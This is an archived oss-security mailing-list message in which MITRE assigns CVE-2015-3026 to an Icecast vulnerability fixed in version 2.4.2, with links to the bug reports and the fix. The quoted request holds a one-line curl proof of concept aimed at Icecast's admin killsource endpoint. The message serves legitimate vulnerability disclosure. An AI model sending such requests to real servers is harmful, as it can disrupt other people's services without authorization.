Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed,  8 Apr 2015 16:02:40 -0400 (EDT)
From: cve-assign@...re.org
To: thomas@...cker.fi
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: CVE Request for Icecast 2.3.3, 2.4.0, 2.4.1, fixed in 2.4.2

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Proof of concept:
> curl "http://example.org:8000/admin/killsource?mount=/test.ogg"

> https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=782120
> https://trac.xiph.org/ticket/2191
> http://lists.xiph.org/pipermail/icecast-dev/2015-April/002460.html
> https://trac.xiph.org/changeset/27abfbbd688df3e3077b535997330aa06603250f/icecast-server

Use CVE-2015-3026.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJVJYi2AAoJEKllVAevmvms858IAI8wg3JmqdfCvZxkAxnR6F15
pcYt1qveLRqwK33Y3Og7ZGfGsO1xaKdY/af1RbTzklvYA1SrnZjmjqdF8R8+fZwe
lCKWOhlHSxmEuEJo4XyMt2ZWP9LZ5h2MwqVNAwFqQ4/BfTesEWB0beV37jzmWejQ
bVVg6irkB8kHvoXCcCwhtj/Gc5cSrAdQHuep8wz2PnYyv1aH9FMtrBIQlX1ujwC3
EUYgpVUpckvPK7EEmyMwQq7nKU3h+JsSHaJJAPfffre//7WF4BTcqT0R1Bfw6ekK
cLaRbSgQwq/mknq28bq0BGq3ihtMVoH/bfmqWPcVaCbtDRTjGZ7EIRQs7GKQvT0=
=5Sv4
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.